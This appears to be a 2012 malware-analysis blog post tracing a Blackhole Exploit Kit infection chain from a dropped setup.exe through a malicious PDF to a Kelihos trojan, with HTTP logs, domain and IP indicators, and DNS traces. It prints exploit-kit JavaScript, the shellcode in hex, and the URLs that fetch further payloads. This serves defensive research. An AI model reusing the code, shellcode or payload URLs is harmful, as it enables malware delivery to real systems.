↑Yes it is a binary file, was set to be "setup.exe". I will do the binary analysis later, but let me explain what this malware does after executed into your system:

1. After injecting malicious code into another process:

0xdc setup.exe 
0x348 svchost.exe
2. It tried connecting to the below malware domains:
a-wing.com.ar 
girasoles-web.com.ar
hsd-transport.com
amcarlosbarrios.es
littleowlletterpress.com
beach-hotel-andalusia.com
jastreb.hr
gyneco-saint-andre.fr
aliyahraks.com
tvmarinaresort.com
3. Each connected domains will be requested HTTP/GET:
a-wing.com.ar GET /h.htm HTTP/1.1
girasoles-web.com.ar GET /g.htm HTTP/1.1
hsd-transport.com GET /g.htm HTTP/1.1
amcarlosbarrios.es GET /m.htm HTTP/1.1
littleowlletterpress.com GET /v.htm HTTP/1.1
beach-hotel-andalusia.com GET /x.htm HTTP/1.1
jastreb.hr GET /c.htm HTTP/1.1
gyneco-saint-andre.fr GET /y.htm HTTP/1.1
aliyahraks.com GET /u.htm HTTP/1.1
tvmarinaresort.com GET /o.htm HTTP/1.1
↑these requests are rapidly queried, I counted in my machine within 90sec it requested 22,000 requests!

4. Upon connected you will be redirected to BHEK↓

--20:26:56--  h00p://beach-hotel-andalusia.com/x.htm
=> `x.htm'
Resolving beach-hotel-andalusia.com... seconds 0.00, 213.175.208.2
Caching beach-hotel-andalusia.com => 213.175.208.2
Connecting to beach-hotel-andalusia.com|213.175.208.2|:80... seconds 0.00, connected.
:
GET /x.htm h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: beach-hotel-andalusia.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
h00p request sent, awaiting response...
:
h00p/1.1 301 Moved Permanently
Content-Length: 239
Content-Type: text/html
Location: h00p://linsubby.ru/count4.php
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Dec 2012 11:27:02 GMT
Connection: close
:
301 Moved Permanently
Location: h00p://linsubby.ru/count4.php [following]
--20:26:57-- h00p://linsubby.ru/count4.php
=> `count4.php'
Resolving linsubby.ru... seconds 0.00, 31.207.231.141
Caching linsubby.ru => 31.207.231.141
Connecting to linsubby.ru|31.207.231.141|:80... seconds 0.00, connected.
:
GET /count4.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: linsubby.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
h00p request sent, awaiting response...
:
h00p/1.1 302
Server: Apache
Content-Length: 0
Content-Type:
Last-Modified: ┬±, 30 ΣσΩ 2012 11:27:01 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 30 Dec 2012 11:26:59 GMT
X-Powered-By:PHP/5.3.2
Location:h00p://wufjajcy.ru/links/1.php
:
302
Location: h00p://wufjajcy.ru/links/1.php [following]
Closed fd 1896
--20:27:00-- h00p://wufjajcy.ru/links/1.php
=> `1.php'
Resolving wufjajcy.ru... seconds 0.00, 184.82.27.102
Caching wufjajcy.ru => 184.82.27.102
Connecting to wufjajcy.ru|184.82.27.102|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d6548 (new refcount 1).
:
GET /links/1.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: wufjajcy.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 11:27:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.18
:
200 OK
Length: unspecified [text/html]
20:27:17 (6.67 KB/s) - `1.php' saved [92673]
After being redirected few times, we arrived at wufjajcy.ru to fetch 1.php file. This 1.php file is the BHEK landing page.

The Sharing of BHEK Infector Resources/Code


The BHEK landing page HTML code is here--->>[PASTEBIN]
The decoded BHEK PluginDetect 0.7.9 is here -->>[PASTEBIN]
(Please read our previous post about BHEK for the guidance to decode)

The BHEK was weaponized for ONLY dropping the PDF at the function p1:
function p1(){
var d = document.createElement("object");
d.setAttribute("data", "/links/1.php?dcdjf=" + x("c833f") + "&nybnj=" + x("cqk") +
"&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);}
As per explained before, let's use THEIR function to crack their code:
var a=x("TYPE-THE-STRING-HERE");
function x(s){
d = [];
for (i = 0; i k = (s.charCodeAt(i)).toString(33);
d.push(k); } ; return d.join(":");}
document.write(a);
Which lead us to the download url of:
/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
Wrapped it with the BHEK domain name and download it:
URL: h00p://wufjajcy.ru/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
GET /links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: I am speachless seeing how fool your codes are - #MalwareMustDie
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 12:18:46 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Content-Length: 21419
ETag: "834215633845d4bc9d54eff04e9f149b"
Last-Modified: Sun, 30 Dec 2012 12:19:11 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,419 (21K) [application/pdf]
21:18:45 (9.04 KB/s) - `1.php@dcdjf' saved [21419/21419]
The downloaded file is actually a PDF file, contains evil JavaScript.
That code is at 0x48D; I made GUIDE to crack & analyze it here--->>[PASTEBIN]
The usage of Adobe Reader exploit codes of
(1) Collab.getIcon Exploit CVE-2009-0927 , and (2) Collab.collectEmailInfo CVE-2007-5659
↑clearly stated in the guide that exploit was used - to execute the obfuscated shellcode strings, which in HEX can be viewed as per below:
66 83 e4 fc fc 85 e4 75  34 e9 5f 33 cO 64 8b 4O   f......u4._3.d.@
3O 8b 4O Oc 8b 7O 1c 56 8b 76 O8 33 db 66 8b 5e O.@..p.V.v.3.f.^
3c O3 74 33 2c 81 ee 15 1O ff ff b8 8b 4O 3O c3 <.t3>46 39 O6 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51 F9.u..4$..uQ..LQ
56 8b 75 3c 8b 74 35 78 O3 f5 56 8b 76 2O O3 f5 V.u<.t5x..v.v...>33 c9 49 41 fc ad O3 c5 33 db Of be 1O 38 f2 74 3.IA....3....8.t
O8 c1 cb Od O3 da 4O eb f1 3b 1f 75 e6 5e 8b 5e ......@..;.u.^.^
24 O3 dd 66 8b Oc 4b 8d 46 ec ff 54 24 Oc 8b d8 $..f..K.F..T$...
O3 dd 8b O4 8b O3 c5 ab 5e 59 c3 eb 53 ad 8b 68 ........^Y..S..h
2O 8O 7d Oc 33 74 O3 96 eb f3 8b 68 O8 8b f7 6a ..}.3t.....h...j
O5 59 e8 98 ff ff ff e2 f9 e8 OO OO OO OO 58 5O .Y............XP
6a 4O 68 ff OO OO OO 5O 83 cO 19 5O 55 8b ec 8b j@h....P...PU...
5e 1O 83 c3 O5 ff e3 68 6f 6e OO OO 68 75 72 6c ^......hon..hurl
6d 54 ff 16 83 c4 O8 8b e8 e8 61 ff ff ff eb O2 mT........a.....
eb 72 81 ec O4 O1 OO OO 8d 5c 24 Oc c7 O4 24 72 .r.......\$...$r
65 67 73 c7 44 24 O4 76 72 33 32 c7 44 24 O8 2O egs.D$.vr32.D$..
2d 73 2O 53 68 f8 OO OO OO ff 56 Oc 8b e8 33 c9 -s.Sh.....V...3.
51 c7 44 1d OO 77 7O 62 74 c7 44 1d O5 2e 64 6c Q.D..wpbt.D...dl
6c c6 44 1d O9 OO 59 8a c1 O4 3O 88 44 1d O4 41 l.D...Y...O.D..A
51 6a OO 6a OO 53 57 6a OO ff 56 14 85 cO 75 16 Qj.j.SWj..V...u.
6a OO 53 ff 56 O4 6a OO 83 eb Oc 53 ff 56 O4 83 j.S.V.j....S.V..
c3 Oc eb O2 eb 13 47 8O 3f OO 75 fa 47 8O 3f OO ......G.?.u.G.?.
75 c4 6a OO 6a fe ff 56 O8 e8 9c fe ff ff 8e 4e u.j.j..V.......N
Oe ec 98 fe 8a Oe 89 6f O1 bd 33 ca 8a 5b 1b c6 .......o..3..[..
46 79 36 1a 2f 7O 68 74 74 7O 3a 2f 2f 77 75 66 Fy6./phOOp://wuf
6a 61 6a 63 79 2e 72 75 2f 6c 69 6e 6b 73 2f 31 jajcy.ru/links/1
2e 7O 68 7O 3f 7a 65 67 71 71 7a 68 3d 33 3O 3a .php?zegqqzh=3O:
31 6e 3a 31 69 3a 31 69 3a 33 33 26 75 77 75 63 1n:1i:1i:33&uwuc
3d 31 6a 3a 31 6e 3a 31 6d 3a 31 6c 3a 31 6d 3a =1j:1n:1m:1l:1m:
32 77 3a 33 31 3a 31 6a 3a 31 6d 3a 31 67 26 63 2w:31:1j:1m:1g&c
6e 77 3d 31 68 26 6b 72 61 63 3d 6b 66 78 69 26 nw=1h&krac=kfxi&
7a 61 67 6f 3d 6d 71 73 71 6a 78 77 67 OO OO OO zago=mqsqjxwg...

Payload 2

In the bottom of the HEX code you can see the payload url :-) let's fetch it:
URL: h00p://wufjajcy.ru/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg
GET /links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie is taking a break... running out of paint..
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 13:11:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Pragma: public
Expires: Sun, 30 Dec 2012 13:12:19 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 23040
---response end---
200 OK
Length: 23,040 (23K) [application/x-msdownload]
100%[=================> ] 23,040 3.49K/s ETA 00:00
22:11:52 (3.49 KB/s) - `calc.exe' saved [23040/23040]
Another payload, calc.exe, so be it. This calc.exe will self-deleted+copied to:
%System%\ntvdm.exe
And run by CMD to start these processes:
0x348 svchost.exe 
0x420 svchost.exe
0x7e4 ntvdm.exe
0x7e4 ntvdm.exe
0x7e4 ntvdm.exe
And then requesting connection to these random domains:

cucaklif.ru
worgukiw.ru
oqivynle.ru
voxyqjyc.ru
qysriloh.ru
lymurufa.ru
ektizzab.ru
batycfac.ru
akmaxook.ru
nosgazim.ru
nopepkaq.ru
lofibvar.ru
lejbomor.ru
yficebnu.ru
tyjkexax.ru
:
(and maybe others after getting some chance to analyze the binary)
The domain & IP info of calc.exe:
wufjajcy.ru  A  184.82.27.102
wufjajcy.ru NS ns1.larstor.com
wufjajcy.ru NS ns2.larstor.com
wufjajcy.ru NS ns3.larstor.com
wufjajcy.ru NS ns4.larstor.com
wufjajcy.ru NS ns5.larstor.com
wufjajcy.ru NS ns6.larstor.com

Payload 3

This calc.exe is downloading another malware file "newbos2.exe" via HTTP GET command, with PoC:
--22:21:21--  h00p://cucaklif.ru/newbos2.exe
=> `newbos2.exe'
Resolving cucaklif.ru... seconds 0.00, 37.19.146.142
Caching cucaklif.ru => 37.19.146.142
Connecting to cucaklif.ru|37.19.146.142|:80... seconds 0.00, connected.
:
GET /newbos2.exe HTTP/1.0
Accept: */*
Host: cucaklif.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 Ok
Server: Apache
Content-Length: 763904
Content-Type: application/octet-stream
Last-Modified: ┬≥, 01 φΓ 2002 02:16:15 GMT
Accept-Ranges: bytes
200 Ok
Length: 763,904 (746K) [application/octet-stream]
100%[===================================> ] 763,904 7.06K/s ETA 00:00
22:31:13 (1.26 KB/s) - `newbos2.exe' saved [763904/763904]
A quick sandbox analysis is:
// SELF-EXECUTED...

PId: 0x4ac
Image Name: C:\newbos2.exe
API:
CreateServiceA(hSCManager: 0x157048,
lpServiceName: "NPF",
lpDisplayName: "WinPcap Packet Driver (NPF)",
dwDesiredAccess: 0xf01ff,
dwServiceType: 0x1,
dwStartType: 0x3,
dwErrorControl: 0x1,
lpBinaryPathName: "system32\drivers\NPF.sys",
lpLoadOrderGroup: "(null)",
lpdwTagId: 0x0,
lpDependencies: 0x0,
lpServiceStartName: "(null)",
lpPassword: 0x0)

// REGISTRY...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SonyAgent
REG_SZ 38 "C:\newbos2.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ContextChangedCurrent
REG_SZ 138 "DMaWNZ4Ku1rL7IDJKR1RYFEEIRwBnxpmODxxvk5HaMX2C4K67X6Jyj7poL8MPRl87w=="

HKLM\System\CurrentControlSet\Services\NPF\DisplayName
REG_SZ 56 "WinPcap Packet Driver (NPF)"

LM\System\CurrentControlSet\Services\NPF\ImagePath
REG_EXPAND_SZ 50 "system32\drivers\NPF.sys"

//SOME DROPS....

C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\wpcap.dll

//STARTING SERVICE: WinPcap Packet Driver (NPF) up...

CreateServiceA(hSCManager: 0x157048,
lpServiceName: "NPF",
lpDisplayName: "WinPcap Packet Driver (NPF)",
dwDesiredAccess: 0xf01ff,
dwServiceType: 0x1,
dwStartType: 0x3,
dwErrorControl: 0x1,
lpBinaryPathName: "system32\drivers\NPF.sys",
lpLoadOrderGroup: "(null)",
lpdwTagId: 0x0,
lpDependencies: 0x0,
lpServiceStartName: "(null)",
lpPassword: 0x0)

// SUSPICIOUS HTTP querry:

\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ez\xec\x85ez\xfc\x85ez-\x8bez\"\x8aez2\x8bez\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1H\xffP\xb3\xf6\xec]\x0fd\x97\xdd\x85\x93W\xa2;Xo\x82\x11k\x05\x9b\xf1\xe7:|\xd3\xf98\x88\xc8\x8e\xfdf\x0f\xe2\xcbs\xf0\x07\xa31\x99\x1f\x9ee@\x01R\x91\x1d\xc80>t\xdf-L\xe6\x1d\xa2\x0f\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1Hso\xc8\xe5\xb0\xc8A\x11\xc6L\xea\xb0\x04\x13\xa5\x83}^`8Dp\xcd
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezg\x86ezw\x86ez\xa8\x8bez\x9d\x8aez\xad\x8bez\xad=P\xdf\tj\x86\xf7\x8b\x10>\x18BA\x9b\x90\xd5\xe3\xc0\xec\xb5_N\xb6\xe3\x92\vkL\x86\xb8\x02\xe3\x9dH\x1c\x88\x82<!b\x94E
\x9e\x85ezc\x86ezs\x86ez\xa4\x8bez\x99\x8aez\xa9\x8bez\xa7\x91\xb4\xed\xa3RW#\"p\x87)P\xd4\x98\xb3\x99\x1a\x869\x1dGo\xf2B\xdc\x9e\x97\xdb\x07\x9e\x85ez\xf1\x85ez\x01\x86ez2\x8bez'\x8aez7\x8bez\xfa\x9f\xb1\xb0p:\xd2\xcax\xf7\xe2bO\xd1e\xf2\x84{\x05\xcf\x18B\xde\xa8\\\xad\xe6\xcf\x8bR\xae\xc9\x1c:J\xab\xe4\xf1\xeb\xf8\x98\\\xd4\xeb\rjE\xcfM\xae\xe6\xcd\xf6\xfbo\xc9\x1c\x9c\xec\xaa\xb8
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezQ\x86eza\x86ez\x92\x8bez\x87\x8aez\x97\x8bez\xeav>HN\xec\x8d\xe3I\x8f\xd3\x9br(\xba\x99\x86c\xd9\xb6kB\x9ab\xa3-\\\x1f\xe0\xb1\x88\xb8\xc3)\vg\xech^P+1\xe9\xdf\xa8\x1a(\xe3\xe5\xe2\xe2\x07\"K\xa8Jx
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezV\x86ezf\x86ez\x97\x8bez\x8c\x8aez\x9c\x8bez\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb2$S\xe9\xb8\x13\xc9\x94\xcb\xb46\x83\x85\xa9\x191.\\?B\xe9\x97X\xf5\xf0+\xe2Oq\x04b\xc8#!N:\xe5\x04\x89\xfe\x87\xc6\xa2[\x85\bU\xda\xeb\x8a_\x80\xf3\x1a\xeb\x95\tn\xb8\xf0\xe1\xda\x9d\xcf\xca\x88Z\xd6\x92\xf3\x03\xef:R\x04\xc4e~\x9ct*=\x92\x93\x15\xc3U\x91\x1d\xe5:F\xaa\x0c\xe6$b\xd3+\xc8\xa7\xe7\x1e)\b\xfe\x0cC5\x852ca9#nz]\xdd\xe5\xf9\xaf\x1a)h\x98\xaa6\xa8\x12\xb9p\xbdfj\xbe\x89\xb8~\b\xc6\xb3\xc4\xe4\x86\xfd\xdcC\xc6&\xff\x9c\xc9\x96\x1e(E>j\x88\xdce$r\x93\x97\x98\xf2\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb\x8dEIu\xb8'htt\xa6\xb2\x97\xec\x91\xcf\xcd\x9e\x85
\x9e\x85ez\xee\x85ez\xfe\x85ez/\x8bez$\x8aez4\x8bez\x07C\x12\xa3d\xb1J\xcfh\xcaI8u=\xb0\x03\xe09ak\xa6R.\xc4\r\x12\xadWN\x82
\x9e\x85ez\xfc\x85ez\x0c\x86ez=\x8bez2\x8aezB\x8bez\x0eqd\xf3\rV\xb3\xed\xfa\x1a\xabN\r\xf1CH\x17rX\x1c\xea\xd5\xb2P\\\xb8\xf1\xfd\\\x9d\xa7\"i\x18\xba6\xb9q\xb9\x05\x80\xc6m\xafO\xb4\xfa\x98\xb9&)Rh\xb8\xff|\xf8\x82\x9a'\x0e\x01\xefAz\t\"{\xaf#\xa9D\t \x97\x94\xe2\x06\xeb\xf8]`=\xe6\x0c\xd81\x1f\xc2q
\x9e\x85ez/\x86ez?\x86ezp\x8beze\x8aezu\x8bez\xd9Ji$g\xa0\xdb\x80\x99\x99\x85U\xa1\xf4?\xddA\x1b\x1fcc)\xb0\x17\xab\x04\xbf\x94\xd0\xc6\x1e\xd0\x88\xb3J\v'5j\x95ON\x9fo/\xfd\xe5',\xc2
\x9e\x85ez\xfb\x85ez\v\x86ez\x89\xc1\"$\xe5K\xb65X^\xe3\x82\xef\xadd\x13\b-\x99\x84\\n\x19\xe4\xbbD>u

// EXECUTED THREAD PROCESSES..
0x2b0 lsass.exe
0x3f4 svchost.exe

// LOADING MODULE...
C:\WINDOWS\system32\wbem\wbemcons.dll by PID:0x3f4 (svchost.exe)

Virus Total Report

RedKit EK landing page - hcwf.htm 942641ec71e352d531805ed1082d6056 (0/44)BHEK landing page - 1.php a66429f2424a3824a9eb054a9084cf5b (3/46)RedKit Downloaded Troj1- setup.exe dc042fd30376f2f056ab3851be6190c7 (15/43)RedKit Downloaded Troj2- calc.exe 42a4de1001682f27ad55c893af9bd23d (12/46)BHEK PDF Trojan Downldr- sample3.pdf d68baa5a947cd84c993f6c5b972f6708 (22/46)Final Trojan Khelios - newbos2.exe 476f829bc53228c303331aa1f783f7f0 (12/46)

URL Query Report

Samples

:-) Here's the download url (for the research purpose only!) -->>[MEDIAFIRE]

Infector Domain Analysis

The Khelios Domain & Historical IP Information:
cucaklif.ru  A  5.79.227.65
cucaklif.ru A 77.106.119.105
cucaklif.ru A 88.206.64.69
cucaklif.ru A 89.221.113.36
cucaklif.ru A 95.104.102.82
cucaklif.ru A 159.148.124.172
cucaklif.ru A 177.199.108.51
cucaklif.ru A 178.137.235.238
cucaklif.ru A 188.19.160.215
cucaklif.ru A 202.122.63.80
cucaklif.ru A 203.80.126.186

worgukiw.ru A 14.97.222.104
worgukiw.ru A 24.14.110.124
worgukiw.ru A 27.188.153.72
worgukiw.ru A 37.229.235.32
worgukiw.ru A 46.109.154.27
worgukiw.ru A 46.161.190.98
worgukiw.ru A 62.61.52.166
worgukiw.ru A 68.56.17.213
worgukiw.ru A 72.177.166.48
worgukiw.ru A 87.110.18.105
worgukiw.ru A 89.230.155.107
worgukiw.ru A 90.46.70.228
worgukiw.ru A 93.105.108.84
worgukiw.ru A 109.126.30.178
worgukiw.ru A 111.255.78.122
worgukiw.ru A 112.105.92.46
worgukiw.ru A 114.39.91.89
worgukiw.ru A 119.70.17.64
worgukiw.ru A 159.148.43.126
worgukiw.ru A 178.44.196.20
worgukiw.ru A 178.218.65.83
worgukiw.ru A 201.213.124.107

oqivynle.ru A 1.169.174.98
oqivynle.ru A 27.3.193.56
oqivynle.ru A 37.19.146.142
oqivynle.ru A 58.99.12.25
oqivynle.ru A 66.176.136.81
oqivynle.ru A 77.45.11.232
oqivynle.ru A 88.222.224.163
oqivynle.ru A 93.105.37.117
oqivynle.ru A 96.49.157.112
oqivynle.ru A 111.249.158.111
oqivynle.ru A 151.32.120.175
oqivynle.ru A 182.156.158.115
oqivynle.ru A 187.186.74.50
oqivynle.ru A 188.129.225.16
(you can get more infector domains by tracing ↑these IP) The DNS Server used for the Khelios Payload .RU domains:
ns1.newrect.com
ns2.newrect.com
ns3.newrect.com
ns4.newrect.com
ns5.newrect.com
ns6.newrect.com
↑This registrar shall be put into subject of investigation. So let's analyze how these infector domains distributed by its evil DNS to their IP addresses. I am using two random DNS servers as- a start base of tracking its current NS record,
@unixfreaxjp /malware]$ date
Mon Dec 31 04:10:26 JST 2012

@unixfreaxjp /malware]$ mydnstrace cucaklif.ru worgukiw.ru oqivynle.ru

Tracing to cucaklif.ru[a] via 202.238.95.24, maximum of 3 retries
202.238.95.24 (202.238.95.24)
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns6.newrect.com [cucaklif.ru] (46.118.84.205) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (98.203.119.95) Got authoritative answer
| |\___ ns1.newrect.com [cucaklif.ru] (62.178.200.113) * * *
| |\___ ns4.newrect.com [cucaklif.ru] (84.232.243.160) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (14.98.225.76) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (1.169.82.215) Got authoritative answer
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns3.newrect.com [cucaklif.ru] (159.224.247.96) * Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (95.68.85.182) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (176.36.82.206) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (136.169.52.175) Got authoritative answer
| |\___ ns2.newrect.com [cucaklif.ru] (115.252.8.87) Got authoritative answer
| \___ ns1.newrect.com [cucaklif.ru] (87.110.84.205) Got authoritative answer
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns1.newrect.com [cucaklif.ru] (86.125.192.34) * * Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (79.115.4.61) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (60.196.154.12) Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (124.43.156.174) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (66.63.125.247) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (37.123.3.213) Got authoritative answer
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns2.newrect.com [cucaklif.ru] (46.98.30.104) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (218.37.77.170) Got authoritative answer
| |\___ ns1.newrect.com [cucaklif.ru] (114.26.132.112) * * *
| |\___ ns4.newrect.com [cucaklif.ru] (223.179.247.64) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (37.235.181.207) Got authoritative answer
| \___ ns3.newrect.com [cucaklif.ru] (111.119.184.27) * * *
\___ a.dns.ripn.net [ru] (193.232.128.6)
|\___ ns5.newrect.com [cucaklif.ru] (91.196.45.235) Got authoritative answer
|\___ ns3.newrect.com [cucaklif.ru] (195.254.182.197) Got authoritative answer
|\___ ns1.newrect.com [cucaklif.ru] (93.78.154.181) Got authoritative answer
|\___ ns4.newrect.com [cucaklif.ru] (50.150.25.163) Got authoritative answer
|\___ ns2.newrect.com [cucaklif.ru] (213.200.53.16) * * *
\___ ns6.newrect.com [cucaklif.ru] (89.41.42.216) Got authoritative answer

Tracing to worgukiw.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns3.newrect.com [worgukiw.ru] (188.190.5.185) Got authoritative answer
| |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) Got authoritative answer
| |\___ ns6.newrect.com [worgukiw.ru] (86.100.10.121) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (78.97.37.167) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (93.116.113.161) Got authoritative answer
| \___ ns5.newrect.com [worgukiw.ru] (111.88.6.136) *
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns4.newrect.com [worgukiw.ru] (46.250.124.196) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (87.110.88.204) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (95.46.206.59) Got authoritative answer
| |\___ ns6.newrect.com [worgukiw.ru] (50.130.45.53) *
| |\___ ns5.newrect.com [worgukiw.ru] (94.244.177.63) Got authoritative answer
| \___ ns3.newrect.com [worgukiw.ru] (117.226.27.200) Got authoritative answer
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns1.newrect.com [worgukiw.ru] (111.67.75.93) *
| |\___ ns5.newrect.com [worgukiw.ru] (37.99.24.241) *
| |\___ ns3.newrect.com [worgukiw.ru] (49.205.243.189) *
| |\___ ns4.newrect.com [worgukiw.ru] (95.209.170.44) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (175.180.77.31) *
| \___ ns6.newrect.com [worgukiw.ru] (188.124.119.193) Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns5.newrect.com [worgukiw.ru] (109.94.108.114) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (176.240.146.178) Got authoritative answer
| |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) (cached)
| |\___ ns3.newrect.com [worgukiw.ru] (180.149.218.65) *
| |\___ ns2.newrect.com [worgukiw.ru] (91.196.45.235) Got authoritative answer
| \___ ns6.newrect.com [worgukiw.ru] (109.169.207.220) Got authoritative answer
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
\___ e.dns.ripn.net [ru] (193.232.142.17)
|\___ ns2.newrect.com [worgukiw.ru] (95.200.166.236) Got authoritative answer
|\___ ns6.newrect.com [worgukiw.ru] (195.254.182.197) Got authoritative answer
|\___ ns4.newrect.com [worgukiw.ru] (82.212.128.63) Got authoritative answer
|\___ ns3.newrect.com [worgukiw.ru] (218.173.22.77) *
|\___ ns1.newrect.com [worgukiw.ru] (178.148.145.215) *
\___ ns5.newrect.com [worgukiw.ru] (111.254.17.110) Got authoritative answer

Tracing to oqivynle.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns1.newrect.com [oqivynle.ru] (89.148.107.194) Got authoritative answer
| |\___ ns6.newrect.com [oqivynle.ru] (89.200.147.156) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (87.207.101.220) Got authoritative answer
